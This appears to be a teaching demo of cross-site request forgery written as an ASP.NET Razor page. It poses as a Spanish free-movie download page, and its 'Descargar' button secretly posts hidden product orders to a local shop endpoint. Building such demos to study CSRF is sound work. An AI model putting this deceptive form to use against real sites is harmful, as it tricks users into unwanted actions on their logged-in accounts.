@{
        ViewBag.Title = "Home Page";
}

<div class="jumbotron">
    <h1>PELIS GRATIS</h1>
    <img src="~/Images/intouchables.jpg" height="200" width="150" />
    <p>¿Desea descargar la película Intocable?</p>
    <form method="post"
          action="http://localhost:54051/CSRF/Productos">
        <input type="hidden" name="producto"
               value="Fifa 18" />
        <input type="hidden" name="producto"
               value="Pes 18" />
        <input type="hidden" name="producto"
               value="Gran turismo 4" />
        <button type="submit">
            Descargar
        </button>
    </form>
</div>